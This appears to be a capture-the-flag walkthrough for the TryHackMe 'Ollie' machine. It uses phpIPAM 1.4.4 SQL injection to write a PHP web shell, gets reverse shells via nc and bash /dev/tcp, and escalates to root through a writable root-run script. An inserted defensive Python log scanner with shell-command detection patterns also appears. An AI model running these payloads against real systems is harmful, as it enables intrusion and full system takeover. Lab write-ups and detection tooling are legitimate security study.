Today we will take a look at TryHackMe: Ollie. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.
Command: sudo nmap -sT -p- -T5 -vv -oN nmap/all_ports 10.10.86.146
Port 1337 Enumeration
Command: nc IP 1337
Yes, this is a simple chat conversation. In the end, we get the necessary credentials.
I tried to log in to Ollie with SSH, but it didn’t work.
Let’s take a look at the website now.
It is a simple login page. Let’s enter with the credential we have.
I did some research on phpIPAM, and it turned out that version 1.4.4 is vulnerable to SQL injection.
Let’s check here
Go to the Routing section
Go to the example in the Peer Name section. Click the Actions button and select Subnet mapping
Now let’s check the vulnerability.
phpIPAM 1.4.4 - SQL Injection | Fluid Attacks
phpIPAM v1.4.4 allows an authenticated admin user to inject SQL sentences in the "subnet" parameter while searching a…
Command: "union select @@version,2,user(),4 -- -
It works. Now let’s turn it into RCE.
SQLI to RCE - Kayran
Preform sql injection attacks against your database, then convert them into Remote Code execution. Learn how common web…
Command: " union select null,null,null,"<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/backdoor.php" -- -
Now for the reverse shell. Keep in mind that the command has to be URL-encoded when you type it into the URL.
Command: rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP 4242 >/tmp/f
URL Encode and Decode - Online
Encode to URL-encoded format (also known as "percent-encoded") or decode from it with various advanced options. Our…
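From the defender's side, the web shell requests described above leave a recognizable trace in the web server's access log. The following is an added example, not part of the original writeup: it scans combined-format access log lines for requests to PHP files whose URL-decoded query carries shell command fragments or a typical web shell parameter name. The log format, the sample lines, the pattern list and the parameter-name list are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request part of a combined-format log line: "METHOD target HTTP/x" STATUS
LOG_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# Shell fragments that have no business in a query string (assumed pattern list).
SUSPICIOUS = re.compile(r'(mkfifo|/bin/(ba)?sh|/dev/tcp/|\bnc\b|\bwget\b|\bcurl\b)', re.I)
# Parameter names commonly used by one-line web shells (assumed list).
SHELL_PARAMS = {"cmd", "exec", "command"}

def scan_line(line):
    """Return a finding dict if the line looks like web shell use, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    if not url.path.lower().endswith(".php"):
        return None
    # parse_qsl percent-decodes names and values, undoing the URL encoding.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        hit = SUSPICIOUS.search(value)
        if hit or name.lower() in SHELL_PARAMS:
            return {"ip": m["ip"], "path": url.path, "param": name,
                    "status": int(m["status"]),
                    "reason": hit.group(0) if hit else "param-name"}
    return None

def scan(lines):
    """Scan an iterable of log lines and return all findings in order."""
    return [f for f in map(scan_line, lines) if f]

# Constructed sample lines (documentation IP ranges, placeholder listener address).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?page=login HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:04:12 +0000] "GET /backdoor.php?cmd=id HTTP/1.1" 200 54',
    '198.51.100.7 - - [01/Jan/2024:10:05:40 +0000] "GET /backdoor.php?cmd=rm%20-f%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20203.0.113.9%204242%20%3E%2Ftmp%2Ff HTTP/1.1" 200 0',
    '192.0.2.44 - - [01/Jan/2024:10:06:02 +0000] "GET /app/dashboard/ HTTP/1.1" 200 8841',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The parameter-name check catches short commands such as `id` that contain no shell fragment; a PHP file appearing in the web root that is not part of the deployed application is a stronger signal than either heuristic.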
As soon as I received the reverse shell, I changed the user using the previous data.
Command: find / -group ollie 2>/dev/null
There are some interesting results. But this was the most interesting.
After checking it, I saw that it works as root, and I used it to enter the reverse shell command.
Command: echo 'bash -i >& /dev/tcp/IP/4444 0>&1' >> /usr/bin/feedme
And now we are root.
“If you have any questions or comments, please do not hesitate to write. Have a good day.”